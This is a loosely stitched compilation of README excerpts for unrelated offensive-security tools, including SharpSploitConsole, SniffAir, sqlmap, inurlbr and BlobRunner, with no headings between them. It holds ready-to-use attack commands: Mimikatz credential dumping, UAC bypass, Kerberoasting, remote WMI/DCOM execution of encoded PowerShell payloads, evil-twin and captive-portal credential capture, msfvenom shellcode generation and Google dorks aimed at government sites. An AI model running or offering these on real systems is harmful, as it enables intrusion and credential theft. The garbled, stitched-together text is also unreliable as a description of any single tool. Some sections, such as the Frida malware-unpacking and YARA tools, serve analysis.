git clone https://github.com/DarkSpiritz/DarkSpiritz.git

pip install -r requirements.txt

python start.py

./start.py

• Real Time Updating of Configuration
• Never a need to restart the program even when adding plugins or editing them.
• Easy to use UX
• Multi-functionality

root@kali:~# cat /etc/apt/sources.list
deb http://http.kali.org/kali kali-rolling main non-free contrib

root@kali:~# grep VERSION /etc/os-release
VERSION="2018.4"
VERSION_ID="2018.4"
root@kali:~#
root@kali:~# uname -a
Linux kali 4.18.0-kali2-amd64 #1 SMP Debian 4.18.10-2kali1 (2018-10-09) x86_64 GNU/Linux

root@kali:~# apt update && apt -y full-upgrade

• Twitter: @anthemtotheego or @g0ldengunsec

1. Download SharpSploit tool from https://github.com/cobbr/SharpSploit.git
   
2. Open up SharpSploit.sln in Visual Studio and compile (make sure to compile for correct architecture) - Should see drop down with Any CPU > Click on it and open Configuration Manager > under platform change to desired architecture and select ok.
   
3. Download SharpSploitConsole tool and open up SharpSploitConsole.sln
   
4. Copy both SharpSploit.dll and System.Management.Automation.dll found in SharpSploit/bin/x64/Debug directory into SharpSploitConsole/bin/x64/Debug folder
   
5. Next we will set up visual studio to embed our DLL's into our exe so we can just have a single binary we can run on our target machine. We will do this by doing the following:
   

  Install-Package Costura.Fody

<?xml version="1.0" encoding="utf-8"?>
<Weavers>
<Costura />
</Weavers>

6. Inside visual studio, right click References on the righthand side, choose Add Reference, then browse to the SharpSploitConsole/bin/x64/Debug directory where we put our two DLL's, select them and add them.
   
7. Compile, drop binary on target computer and have fun.
   

Interact

Mimi-All

Mimi-Command privilege::debug sekurlsa::logonPasswords

logonPasswords

LsaCache

LsaSecrets

SamDump

Wdigest

whoami

Username

GetSystem

Impersonate 2918

BypassUAC cmd.exe ipconfig C:\Windows\System32\

BypassUAC cmd.exe "" C:\Windows\System32\

RevertToSelf

CurrentDirectory

DirectoryListing

ChangeDirectory SomeFolder

Hostname

ProcessList

ProcDump 2198 C:\Users\Username\Desktop memorydump.dmp

ReadRegistry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\BuildNumber

WriteRegistry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\COM3\RemoteAccessEnabled 1

NetLocalGroupMembers computerName Administrators domain\username P@55w0rd!

NetLocalGroupMembers 192.168.1.20 Administrators .\username P@55w0rd!

NetLocalGroups computerName domain\username P@55w0rd!

NetLocalGroups 192.168.1.20 .\username P@55w0rd!

NetLoggedOnUsers computerName domain\username P@55w0rd!

NetLoggedOnUsers 192.168.1.20 .\username P@55w0rd!

NetSessions computerName domain\username P@55w0rd!

NetSessions 192.168.1.20 .\username P@55w0rd!

Ping computer1 computer2 computer3 computer4

PortScan computer1 80 443 445 22 23

GetDomainUsers

GetDomainGroups

GetDomainGroups -target "Domain Admins"

GetDomainComputers

Kerberoast

Kerberoast -username bob -password Password1 -domain test.corp -server 192.168.1.10 -target sqlService

WMI computer1 domain\username P@55w0rd! <entire powershell empire payload>

WMI computer1 .\username P@55w0rd! powershell -noP -sta -w 1 -enc <Base64>

DCOM computer1 cmd.exe c:\Windows\System32 powershell -noP -sta -w 1 -enc <Base64>

Shell ipconfig /all

Powershell -noP -sta -w 1 -enc <Base64>

• Interact : Starts interactive console mode, if you are interacting remotely you may not want to use this option
• Mimi-All : Executes everything but DCSync, requires admin
• Mimi-Command : Executes a chosen Mimikatz command
• logonPasswords : Runs privilege::debug sekurlsa::logonPasswords
• LsaCache : Retrieve Domain Cached Credentials hashes from registry
• LsaSecrets : Retrieve LSA secrets stored in registry
• SamDump : Retrieve password hashes from the SAM database
• Wdigest : Retrieve Wdigest credentials from registry
• whoami : Retrieve current user
• GetSystem : Impersonate system user, requires admin rights
• Impersonate : Impersonate the token of a specified process, requires pid - command requires admin rights.
• BypassUAC : Bypass UAC, requires binary | command | path to binary - requires admin rights
• RevertToSelf : Ends the impersonation of any token, reverts back to initial token associated with current process
• CurrentDirectory : Retrieve current working directory
• DirectoryListing : Retrieve current directory listing
• ChangeDirectory : Changes the current directory by appending a specified string to the current working directory
• Hostname : Retrieve hostname
• ProcessList : Retrieve list of running processes
• ProcDump : Creates a minidump of the memory of a running process, requires PID | output location | output name - requires admin
• Username : Retrieve current username
• ReadRegistry : Retrieve registry path value, requires full path argument
• WriteRegistry : Write to registry, requires full path argument | value
• NetLocalGroupMembers : Retrieve users of local group remotely, requires computername | groupname | username | password
• NetLocalGroups : Retrieve local groups remotely, requires computername | username | password
• NetLoggedOnUsers : Retrieve current logged on users remotely, requires computername | username | password
• NetSessions : Retrieve user sessions remotely, requires computername | username | password
• Ping : Ping systems, requires computernames"
• PortScan : Port scan systems, requires computername | ports
• GetDomainUsers : Grabs specified (or all) user objects in the target domain, by default will use current user context
• GetDomainGroups : Grabs specified (or all) group objects in the target domain, by default will use current user context
• GetDomainComputers : Grabs specified (or all) computer objects in the target domain, by default will use current user context
• Kerberoast : Performs a kerberoasting attack against targeted (or all) user objects in the target domain, by default will use current user context
• WMI : Run command remotely via WMI, requires computername | username | password | command | requires admin
• DCOM : Run command remotely via DCOM, requires computername | command | directory | params - requires admin
• Shell : Run a shell command
• Powershell : Runs a powershell command while attempting to bypass AMSI, scriptBlock logging, and Module logging

warmachine@ftw:~/BFuzz$ ./generate.sh
warmachine@ftw:~/BFuzz$ python BFuzz.py 
Enter the browser type:
 1: Chrome 
 2: Firefox
>>

• First start a VM (see warning above) if you are going to be unpacking malware.
• Install Python 2.7
• Remember to set your python and pip paths ; )
• Install Frida by typing pip install frida in cmd
• Clone this repository and you are ready to extract!

• CreateProcess
• WriteVirtualMemory (to remote process)
• ResumeThread (in remote process)

• CreateProcess
• NtCreateSection
• NtUnmapViewOfSection (remote process)
• NtMapViewOfSection (remote process)

python FridaExtract.py bad.exe

python FridaExtract.py bad.exe --out_file extracted.exe

python FridaExtract.py bad.exe --args password

python FridaExtract.py bad.exe --raw

• ExitProcess
• NtWriteVirtualMemory
• NtCreateThread
• NtResumeThread
• NtDelayExecution
• CreateProcessInternalW
• NtMapViewOfSection
• NtUnmapViewOfSection
• NtCreateSection

python FridaExtract.py bad.exe --verbose

• Huge thanks to @oleavr for helping me with my endless questions about Frida
• Hat tip to @skier_t for his awesome PE rebuilding script and so much more!

• Any questions, comments, requests hit us up on twitter: @herrcore or @seanmw
• Anything Frida specific find us lurking on IRC: #frida at irc.freenode.net
• Pull requests welcome!

• .js (JScript)
• .vbs (VBScript)
• .wsf (WSFile) (Initial support/testing. - Does not support specific jobs)

• COM ProjIds
• DNS Requests
• Shell Commands
• Network Requests

• Install Python 2.7
• Install the Frida python bindings using pip

pip install frida

• Clone (or download) the frida-wshook repository.

usage: frida-wshook.py [-h] [--debug] [--disable_dns] [--disable_com_init]
                       [--enable_shell] [--disable_net]
                       script

frida-wshook.py your friendly WSH Hooker

positional arguments:
  script              Path to target .js/.vbs file

optional arguments:
  -h, --help          show this help message and exit
  --debug             Output debug info
  --disable_dns       Disable DNS Requests
  --disable_com_init  Disable COM Object Id Lookup
  --enable_shell      Enable Shell Commands
  --disable_net       Disable Network Requests

python wshook.py bad.js

python wshook.py --debug bad.js

python frida-wshook.py --enable_shell bad.vbs

python frida-wshook.py --disable_net bad.vbs

python frida-wshook.py --disable_com_init bad.vbs

• ole32.dll
  • CLSIDFromProgIDEx
• Shell32.dll
  • ShellExecuteEx
• Ws2_32.dll
  • WSASocketW
  • GetAddrInfoExW
  • WSASend
  • WSAStartup

• Network responses are not captured
• Disabling Object Lookup can cause the script to only output the first ProgId...Malware QA can be lacking.
• WSF files with a specific job to target currently isn't supported

• Change GetAddrInfoExW to use .replace instead of .attach
• Add additional tracing and hooks to cover more APIs
• Look at bypassing common anti-analysis techniques found in scripts (sleeps etc)
• Update and improve network request hooking (ie: currently it captures requests, but not responses)

• Install yara-python
  • Using pip: pip install yara-python
  • Other methods: https://pypi.python.org/pypi/yara-python
• Copy FindYara.py to your IDA "plugins" directory

• A huge thank you to David Berard (@p0ly) - Follow him on GitHub here! This is mostly his code and he gets all the credit for the original plugin framework.
• Also, hat tip to Alex Hanel @nullandnull - Follow him on GitHub here. Alex helped me sort through how the IDC methods are being used. His IDA Python book is a fantastic reference!!

• Any questions, comments, requests hit me up on twitter: @herrcore
• Pull requests welcome!

• Download and install Microsoft Visual C++ Build Tools or Visual Studio

• Open Visual Studio Command Prompt
• Navigate to the directory where BlobRunner is checked out
• Build the executable by running:

cl blobrunner.c

• Open x64 Visual Studio Command Prompt
• Navigate to the directory where BlobRunner is checked out
• Build the executable by running:

 cl /Feblobrunner64.exe /Foblobrunner64.out blobrunner.c

• Open BlobRunner in your favorite debugger.
• Pass the shellcode file as the first parameter.
• Add a breakpoint before the jump into the shellcode
• Step into the shellcode

BlobRunner.exe shellcode.bin

BlobRunner.exe shellcode.bin --offset 0x0100

BlobRunner.exe shellcode.bin --nopause

msfvenom -a x86 --platform windows -p windows/exec cmd=calc.exe -o test2.bin

• Any questions, comments or requests you can find us on twitter: @seanmw or @herrcore
• Pull requests welcome!

git clone https://github.com/halitalptekin/isip.git
cd isip
pip install -r requirements.txt

• Packet manipulation tools are in packet cmd loop. First start, you are in the main cmd loop.

isip:main> packet
isip:packet>

• Create a new sip packet with new command. If you don't write name, isip create the packet named by message-{id}.

isip:packet> new
isip:packet> new r1

• List the all created sip packets with list command.

isip:packet> list

• Show properties of packets with show command. You can type ip, udp or sip with show command.

isip:packet> show message-1
isip:packet> show message-1 ip
isip:packet> show message-1 udp
isip:packet> show message-1 sip
isip:packet> show message-1 ip src
isip:packet> show message-1 udp sport
isip:packet> show message-1 sip uri
isip:packet> show message-1 sip headers.to

• Set the properties of packets with set command. You can type ip, udp or sip and properties label with show command.

isip> set message-1 ip src 12.12.12.12
isip> set message-1 udp sport 4545
isip> set message-1 sip method OPTIONS
isip> set message-1 sip headers.from "blabla"

• Set the random properties of packets with set command. You can use with random-headers-from, random-headers-to, random-headers-call-id, random-headers-max-forwards, random-headers-user-agent, random-headers-contact, random-headers-invite-cseq, random-headers-register-cseq commands.

isip:packet> set message-1 ip src random-ip
isip:packet> set message-1 udp sport random-port
isip:packet> set message-1 sip headers.from random-headers-from
isip:packet> set message-1 sip headers.to random-headers-to
isip:packet> set message-1 sip headers.contact random-headers-contact
isip:packet> set message-1 sip body random-data 50

• Send the packet with send command.

isip:packet> send message-1 1
isip:packet> send message-1 150

• Parse the text file to packet with parse command.

isip:packet> parse test/test1.txt r1

• Load the packets from pcap file with load command. If you don't write name, isip create the packet named by message-{id}.

isip:packet> load test.pcap r1
isip:packet> load test.pcap

• Save the packets tp pcap file with save command. You can save the packet list just single command.

isip:packet> save r1 test.pcap
isip:packet> save r2 test.pcap # assume you have r2.0, r2.1, r2.2, r2.3 ...

• Open the wireshark for packets with wireshark command.

isip:packet> wireshark r1
isip:packet> wireshark r2 # assume you have r2.0, r2.1, r2.2, r2.3 ...

• List the history with hist command.

isip:packet> hist

• Execute the shell command with shell or !.

isip:packet> shell ls -la
isip:packet> ! cat /etc/passwd

• Show the help page with ? or help command.

isip> ?
isip> help
isip:packet> ?
isip:packet> help
isip:packet> help new
isip:packet> help send
isip:packet> help set
isip:packet> help show

$./setup.sh

                                                                     % *        ., %                         
                                                                    % ( ,#     (..# %                        
    /@@@@@&,    *@@%        &@,    @@#    /@@@@@@@@@   .@@@@@@@@@. ,/ # # (%%%* % (.(.  .@@     &@@@@@@%.    
  .@@&   *&@    %@@@@.      &@,    @@%    %@@,,,,,,,   ,@@,,,,,,,  .( % %  %%#  # % #   ,@@     @@(,,,#@@@.  
  %@%           %@@(@@.     &@,    @@%    %@@          ,@@          /* #   /*,   %.,,   ,@@     @@*     #@@  
  ,@@&          %@@ ,@@*    &@,    @@%    %@@          ,@@           .#   //#(,   (,    ,@@     @@*     &@%  
   .@@@@@.      %@@  .@@(   &@,    @@%    %@@%%%%%%*   ,@@%%%%%%#         (# ##.        ,@@     @@&%%%@@@%   
       *@@@@    %@@   .@@/  &@,    @@%    %@@,,,,,,    ,@@,,,,,,.        %#####%        ,@@     @@(,,%@@%    
          @@%   %@@     @@( &@,    @@%    %@@          ,@@              %  (*/  #       ,@@     @@*    @@@   
          %@%   %@@      @@&&@,    @@%    %@@          ,@@             %  #  .# .#      ,@@     @@*     @@%  
 .@@&/,,#@@@    %@@       &@@@,    @@%    %@@          ,@@            /(*       /(#     ,@@     @@*      @@# 
   *%@@@&*      *%#        ,%#     #%/    *%#           %%            #############.    .%#     #%.      .%% 
                                                                  (@Tyl0us & @theDarracott)

>>  [default]# help
Commands
========
workspace                Manages workspaces (create, list, load, delete)
live_capture             Initiates a valid wireless interface to collect wireless pakcets to be parsed (requires the interface name)
offline_capture          Begins parsing wireless packets using a pcap file-kismet .pcapdump work best (requires the full path)
offline_capture_list     Begins parsing wireless packets using a list of pcap file-kismet .pcapdump work best (requires the full path)
query                    Executes a query on the contents of the acitve workspace
help                     Displays this help menu
clear                    Clears the screen
show                     Shows the contents of a table, specific information across all tables or the available modules
inscope                  Add ESSID to scope. inscope [ESSID]
SSID_Info                Displays all information (i.e all BSSID, Channels and Encrpytion) related to the inscope SSIDS
use                      Use a SniffAir module
info                     Displays all variable information regarding the selected module
set                      Sets a variable in module
exploit                  Runs the loaded module
run                      Runs the loaded module
exit                     Exit SniffAir
>>  [default]# 

>>  [default]# workspace
     Manages workspaces
 Command Option: workspaces [create|list|load|delete]
>>  [default]# workspace create demo
[+]  Workspace demo created

>>  [demo]# offline_capture /root/sniffair/demo.pcapdump
[+] Importing /root/sniffair/demo.pcapdump
\
[+] Completed
[+] Cleaning Up Duplicates
[+] ESSIDs Observed

>>  [demo]# show table AP
+------+-----------+-------------------+-------------------------------+--------+-------+-------+----------+--------+
|   ID | ESSID     | BSSID             | VENDOR                        |   CHAN |   PWR | ENC   | CIPHER   | AUTH   |
|------+-----------+-------------------+-------------------------------+--------+-------+-------+----------+--------|
|    1 | HoneyPot  | c4:6e:1f:##:##:## | TP-LINK TECHNOLOGIES CO. LTD. |      4 |   -17 | WPA2  | TKIP     | MGT    |
|    2 | Demo      | 80:2a:a8:##:##:## | Ubiquiti Networks Inc.        |     11 |   -19 | WPA2  | CCMP     | PSK    |
|    3 | Demo5ghz  | 82:2a:a8:##:##:## | Unknown                       |     36 |   -27 | WPA2  | CCMP     | PSK    |
|    4 | HoneyPot1 | c4:6e:1f:##:##:## | TP-LINK TECHNOLOGIES CO. LTD. |     36 |   -29 | WPA2  | TKIP     | PSK    |
|    5 | BELL456   | 44:e9:dd:##:##:## | Sagemcom Broadband SAS        |      6 |   -73 | WPA2  | CCMP     | PSK    |
+------+-----------+-------------------+-------------------------------+--------+-------+-------+----------+--------+
>>  [demo]# show SSIDS
---------
HoneyPot
Demo
HoneyPot1
BELL456
Hidden
Demo5ghz
---------

>>  [demo]# show modules
Available Modules
=================
[+] Auto EAP - Automated Brute-Force Login Attack Against EAP Networks
[+] Auto PSK - Automated Brute-Force Passphrase Attack Against PSK Networks
[+] AP Hunter - Discover Access Point Within  a Certain Range Using a Specific Type of Encrpytion
[+] Captive Portal - Web Based Login Portal to Capture User Entered Credentials (Runs as an OPEN Network)
[+] Certificate Generator - Generates a Certificate Used by Evil Twin Attacks
[+] Exporter - Exports Data Stored in a Workspace to a CSV File
[+] Evil Twin - Creates a Fake Access Point, Clients Connect to Divulging MSCHAP Hashes or Cleartext Passwords
[+] Handshaker - Parses Database or .pcapdump Files Extracting the Pre-Shared Handshake for Password Guessing (Hashcat or JTR Format)
[+] Mac Changer - Changes The Mac Address of an Interface
[+] Probe Packet - Sends Out Deauth Packets Targeting SSID(s)
[+] Proof Packet - Parses Database or .pcapdump Files Extracting all Packets Related to the Inscope SSDIS
[+] Hidden SSID - Discovers the Names of HIDDEN SSIDS
[+] Suspicious AP - Looks for Access Points that: Is On Different Channel, use a Different Vendor or Encrpytion Type Then the Rest of The Network
[+] Wigle Search SSID - Queries wigle for SSID (i.e. Bob's wifi)
[+] Wigle Search MAC - Queries wigle for all observations of a single mac address
>>  [demo]# 
>>  [demo]# use Captive Portal
>>  [demo][Captive Portal]# info
Globally Set Varibles
=====================
 Module: Captive Portal
 Interface: 
 SSID: 
 Channel: 
 Template: Cisco (More to be added soon)
>>  [demo][Captive Portal]# set Interface wlan0
>>  [demo][Captive Portal]# set SSID demo
>>  [demo][Captive Portal]# set Channel 1
>>  [demo][Captive Portal]# info
Globally Set Varibles
=====================
 Module: Captive Portal
 Interface: wlan0
 SSID: demo
 Channel: 1
 Template: Cisco (More to be added soon)
>>  [demo][Captive Portal]# 

• hostapd-wpe
• jmalinen/hostap
• lootbooty

A) . <-- current working directory of the executable, highest priority, first check

B) \Windows

C) \Windows\system32

D) \Windows\syswow64 <-- lowest priority, last check

• Use absolute path instead of relative path
• If you have personal sign, sign your DLL files and check the sign in your application before load DLL into memory. otherwise check the hash of DLL file with original DLL hash)

1. Scan import table of executable and find out DLLs that linked to executable
2. Search for DLL files placed inside executable that match with linked DLL (as i said before current working directory of the executable has highest priority)
3. If any DLL found, scan the export table of theme
4. Compare import table of executable with export table of DLL and if any matching was found, the executable and matched common functions flag as DLL hijack candidate.

• Ability to select scan type (signed/unsigned applications)
• Determine executable signer
• Determine wich referenced DLLs candidate for hijacking
• Determine exported method names of candidate DLLs
• Configure rules to determine which hijacks is best or good choice for use and show theme in different colors

• Fingerprint all the things with scannerl at BlackAlps
• Fingerprinting MySQL with scannerl
• Fingerprint ICS/Scada with scannerl
• Distributed fingerprinting with scannerl
• 6 months of ICS scanning

# on debian
$ sudo apt install erlang erlang-src rebar

# on arch
$ sudo pacman -S erlang-nox rebar

$ git clone https://github.com/kudelskisecurity/scannerl.git
$ cd scannerl
$ ./build.sh

$ ./scannerl -h

• scannerl
• scannerl-git

• Master node: this is where scannerl's binary is run
• Slave node(s): this is where scannerl will connect to distribute all its work

• All hosts have the same version of Erlang installed
• All hosts are able to connect to each other using SSH public key
• All hosts' names resolve (use /etc/hosts if no proper DNS is setup)
• All hosts have the same Erlang security cookie
• All hosts must allow connection to Erlang EPMD port (TCP/4369)
• All hosts have the following range of ports opened: TCP/11100 to TCP/11100 + number-of-slaves

$ ./scannerl -h
   ____   ____    _    _   _ _   _ _____ ____  _
  / ___| / ___|  / \  | \ | | \ | | ____|  _ \| |
  \___ \| |     / _ \ |  \| |  \| |  _| | |_) | |
   ___) | |___ / ___ \| |\  | |\  | |___|  _ <| |___
  |____/ \____/_/   \_\_| \_|_| \_|_____|_| \_\_____|

USAGE
  scannerl MODULE TARGETS [NODES] [OPTIONS]

  MODULE:
    -m <mod> --module <mod>
      mod: the fingerprinting module to use.
           arguments are separated with a colon.

  TARGETS:
    -f <target> --target <target>
      target: a list of target separated by a comma.
    -F <path> --target-file <path>
      path: the path of the file containing one target per line.
    -d <domain> --domain <domain>
      domain: a list of domains separated by a comma.
    -D <path> --domain-file <path>
      path: the path of the file containing one domain per line.

  NODES:
    -s <node> --slave <node>
      node: a list of node (hostnames not IPs) separated by a comma.
    -S <path> --slave-file <path>
      path: the path of the file containing one node per line.
            a node can also be supplied with a multiplier (<node>*<nb>).

  OPTIONS:
    -o <mod> --output <mod>     comma separated list of output module(s) to use.
    -p <port> --port <port>     the port to fingerprint.
    -t <sec> --timeout <sec>    the fingerprinting process timeout.
    -T <sec> --stimeout <sec>   slave connection timeout (default: 10).
    -j <nb> --max-pkt <nb>      max pkt to receive (int or "infinity").
    -r <nb> --retry <nb>        retry counter (default: 0).
    -c <cidr> --prefix <cidr>   sub-divide range with prefix > cidr (default: 24).
    -M <port> --message <port>  port to listen for message (default: 57005).
    -P <nb> --process <nb>      max simultaneous process per node (default: 28232).
    -Q <nb> --queue <nb>        max nb unprocessed results in queue (default: infinity).
    -C <path> --config <path>   read arguments from file, one per line.
    -O <mode> --outmode <mode>  0: on Master, 1: on slave, >1: on broker (default: 0).
    -v <val> --verbose <val>    be verbose (0 <= int <= 255).
    -K <opt> --socket <opt>     comma separated socket option (key[:value]).
    -l --list-modules           list available fp/out modules.
    -V --list-debug             list available debug options.
    -A --print-args             Output the args record.
    -X --priv-ports             use only source port between 1 and 1024.
    -N --nosafe                 keep going even if some slaves fail to start.
    -w --www                    DNS will try for www.<domain>.
    -b --progress               show progress.
    -x --dryrun                 dry run.

grep -q "127.0.1.1\s*`hostname`" /etc/hosts || echo "127.0.1.1 `hostname`" | sudo tee -a /etc/hosts

cat $HOME/.ssh/id_rsa.pub >> $HOME/.ssh/authorized_keys

./scannerl -m httpbg -d google.com

./scannerl -m httpbg -d google.com -s host1,host2,host3

$ ./scannerl -l

Fingerprinting modules available
================================

bacnet             UDP/47808: Bacnet identification
chargen            UDP/19: Chargen amplification factor identification
fox                TCP/1911: FOX identification
httpbg             TCP/80: HTTP Server header identification
                     - Arg1: [true|false] follow redirection [Default:false]
httpsbg            SSL/443: HTTPS Server header identification
https_certif       SSL/443: HTTPS certificate graber
imap_certif        TCP/143: IMAP STARTTLS certificate graber
modbus             TCP/502: Modbus identification
mqtt               TCP/1883: MQTT identification
mqtts              TCP/8883: MQTT over SSL identification
mysql_greeting     TCP/3306: Mysql version identification
pop3_certif        TCP/110: POP3 STARTTLS certificate graber
smtp_certif        TCP/25: SMTP STARTTLS certificate graber
ssh_host_key       TCP/22: SSH host key graber

Output modules available
========================

csv                output to csv
                     - Arg1: [true|false] save everything [Default:true]
csvfile            output to csv file
                     - Arg1: [true|false] save everything [Default:false]
                     - Arg2: File path
file               output to file
                     - Arg1: File path
file_ip            output to stdout (only ip)
                     - Arg1: File path
file_mini          output to file (only ip and result)
                     - Arg1: File path
file_resultonly    output to file (only result)
                     - Arg1: File path
stdout             output to stdout
stdout_ip          output to stdout (only IP)
stdout_mini        output to stdout (only ip and result)

./scannerl -m httpbg -d google.com -o file:/tmp/result

{module, target, port, result}

• module: the module used (Erlang atom)
• target: IP or hostname (string or IPv4 address)
• port: the port (integer)
• result: see below

{{status, type},Value}

• {ok, result}: fingerprinting the target succeeded
• {error, up}: fingerprinting didn't succeed but the target responded
• {error, unknown}: fingerprinting failed

• Fingerprinting module: to query a specific protocol or service. As an example, the fp_httpbg.erl module allows to retrieve the server entry in the HTTP response.
• Output module: to output to a specific database/filesystem or output the result in a specific format. For example, the out_file.erl and out_stdout.erl modules allow respectively to output to a file or to stdout (default behavior if not specified).

git clone https://github.com/tokyoneon/Armor
cd Armor/
chmod +x armor.sh
./armor.sh /path/to/payload.txt 1.2.3.4 443

• Twitter: @tokyoneon_
• WonderHowTo: https://creator.wonderhowto.com/tokyoneon/
• Email: dG9reW9uZW9uQHBtLm1lCg==

• Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase, SAP MaxDB, HSQLDB and Informix database management systems.
• Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query-based, stacked queries and out-of-band.
• Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
• Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
• Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.
• Support to dump database tables entirely, a range of entries or specific columns as per user's choice. The user can also choose to dump only a range of characters from each column's entry.
• Support to search for specific database names, specific tables across all databases or specific columns across all databases' tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns' names contain string like name and pass.
• Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
• Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
• Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user's choice.
• Support for database process' user privilege escalation via Metasploit's Meterpreter getsystem command.

git clone --depth 1 https://github.com/sqlmapproject/sqlmap.git sqlmap-dev

python sqlmap.py -h

python sqlmap.py -hh

• Homepage: http://sqlmap.org
• Download: .tar.gz or .zip
• Commits RSS feed: https://github.com/sqlmapproject/sqlmap/commits/master.atom
• Issue tracker: https://github.com/sqlmapproject/sqlmap/issues
• User's manual: https://github.com/sqlmapproject/sqlmap/wiki
• Frequently Asked Questions (FAQ): https://github.com/sqlmapproject/sqlmap/wiki/FAQ
• Twitter: @sqlmap
• Demos: http://www.youtube.com/user/inquisb/videos
• Screenshots: https://github.com/sqlmapproject/sqlmap/wiki/Screenshots

• Bulgarian
• Chinese
• Croatian
• French
• Greek
• Indonesian
• Italian
• Japanese
• Portuguese
• Spanish
• Turkish

• Burpsuite
• Java

• Burpsuite 1.7.36
• Windows 10
• xubuntu 18.04
• Kali Linux 2018

• The IProxyListener decrypt requests and encrypt responses, and an IHttpListener than encrypt requests and decrypt responses.
• Burp sees the decrypted traffic, including Repeater, Intruder and Scanner, but the client/mobile app and server see the encrypted version.

• Require AES Encryption Key (Can be obtained by using frida script or reversing mobile app)
• Require AES Encryption Initialize Vector (Can be obtained by using frida script or reversing mobile app)
• Request Parameter (Leave blank in case of whole request body)
• Response Parameter (Leave blank in case of whole response body)
• Character Separated with space for obfuscation on request/response (In case of Offuscation)
• URL/Host of target to decrypt/encrypt request and response

Download jar file from Release and add in burpsuite

• First setup frida server on IOS and Android device.
• Launch Application on mobile device.
• Run this frida script on your host machine to get AES Encryption Key and IV.

• Provide SecretSpecKey under Secret Key field
• Procide IV under Initialize Vector field
• Provide Host/URL to filter request and response for encryption and decryption
• Press Start AES Killer

git clone https://github.com/gmdutra/docker-inurlbr.git
cd docker-inurlbr
docker build -t gmdutra/inurlbr .

docker run --name inurlbr -it -d gmdutra/inurlbr

• HELP:

-h
--help   Alternative long length help command.
--ajuda  Command to specify Help.
--info   Information script.
--update Code update.    
-q       Choose which search engine you want through [1...24] / [e1..6]]:
     [options]:
     1   - GOOGLE / (CSE) GENERIC RANDOM / API
     2   - BING
     3   - YAHOO BR
     4   - ASK
     5   - HAO123 BR
     6   - GOOGLE (API)
     7   - LYCOS
     8   - UOL BR
     9   - YAHOO US
     10  - SAPO
     11  - DMOZ
     12  - GIGABLAST
     13  - NEVER
     14  - BAIDU BR
     15  - YANDEX
     16  - ZOO
     17  - HOTBOT
     18  - ZHONGSOU
     19  - HKSEARCH
     20  - EZILION
     21  - SOGOU
     22  - DUCK DUCK GO
     23  - BOOROW
     24  - GOOGLE(CSE) GENERIC RANDOM
     ----------------------------------------
                 SPECIAL MOTORS
     ----------------------------------------
     e1  - TOR FIND
     e2  - ELEPHANT
     e3  - TORSEARCH
     e4  - WIKILEAKS
     e5  - OTN
     e6  - EXPLOITS SHODAN
     ----------------------------------------
     all - All search engines / not special motors
     Default:    1
     Example: -q {op}
     Usage:   -q 1
              -q 5
               Using more than one engine:  -q 1,2,5,6,11,24
               Using all engines:      -q all

 --proxy Choose which proxy you want to use through the search engine:
     Example: --proxy {proxy:port}
     Usage:   --proxy localhost:8118
              --proxy socks5://googleinurl@localhost:9050
              --proxy http://admin:12334@172.16.0.90:8080

 --proxy-file Set font file to randomize your proxy to each search engine.
     Example: --proxy-file {proxys}
     Usage:   --proxy-file proxys_list.txt

 --time-proxy Set the time how often the proxy will be exchanged.
     Example: --time-proxy {second}
     Usage:   --time-proxy 10

 --proxy-http-file Set file with urls http proxy, 
     are used to bular capch search engines
     Example: --proxy-http-file {youfilehttp}
     Usage:   --proxy-http-file http_proxys.txt


 --tor-random Enables the TOR function, each usage links an unique IP.

 -t  Choose the validation type: op 1, 2, 3, 4, 5
     [options]:
     1   - The first type uses default errors considering the script:
     It establishes connection with the exploit through the get method.
     Demo: www.alvo.com.br/pasta/index.php?id={exploit}

     2   -  The second type tries to valid the error defined by: -a='VALUE_INSIDE_THE _TARGET'
     It also establishes connection with the exploit through the get method
     Demo: www.alvo.com.br/pasta/index.php?id={exploit}

     3   - The third type combine both first and second types:
     Then, of course, it also establishes connection with the exploit through the get method
     Demo: www.target.com.br{exploit}
     Default:    1
     Example: -t {op}
     Usage:   -t 1

     4   - The fourth type a validation based on source file and will be enabled scanner standard functions.
     The source file their values are concatenated with target url.
     - Set your target with command --target {http://target}
     - Set your file with command -o {file}
     Explicative:
     Source file values:
     /admin/index.php?id=
     /pag/index.php?id=
     /brazil.php?new=
     Demo: 
     www.target.com.br/admin/index.php?id={exploit}
     www.target.com.br/pag/index.php?id={exploit}
     www.target.com.br/brazil.php?new={exploit}

     5   - (FIND PAGE) The fifth type of validation based on the source file,
     Will be enabled only one validation code 200 on the target server, or if the url submit such code will be considered vulnerable.
     - Set your target with command --target {http://target}
     - Set your file with command -o {file}
     Explicative:
     Source file values:
     /admin/admin.php
     /admin.asp
     /admin.aspx
     Demo: 
     www.target.com.br/admin/admin.php
     www.target.com.br/admin.asp
     www.target.com.br/admin.aspx
     Observation: If it shows the code 200 will be separated in the output file

     DEFAULT ERRORS:  

     [*]JAVA INFINITYDB, [*]LOCAL FILE INCLUSION, [*]ZIMBRA MAIL,           [*]ZEND FRAMEWORK, 
     [*]ERROR MARIADB,   [*]ERROR MYSQL,          [*]ERROR JBOSSWEB,        [*]ERROR MICROSOFT,
     [*]ERROR ODBC,      [*]ERROR POSTGRESQL,     [*]ERROR JAVA INFINITYDB, [*]ERROR PHP,
     [*]CMS WORDPRESS,   [*]SHELL WEB,            [*]ERROR JDBC,            [*]ERROR ASP,
     [*]ERROR ORACLE,    [*]ERROR DB2,            [*]JDBC CFM,              [*]ERROS LUA, 
     [*]ERROR INDEFINITE


 --dork Defines which dork the search engine will use.
     Example: --dork {dork}
     Usage:   --dork 'site:.gov.br inurl:php? id'
     - Using multiples dorks:
     Example: --dork {[DORK]dork1[DORK]dork2[DORK]dork3}
     Usage:   --dork '[DORK]site:br[DORK]site:ar inurl:php[DORK]site:il inurl:asp'

 --dork-file Set font file with your search dorks.
     Example: --dork-file {dork_file}
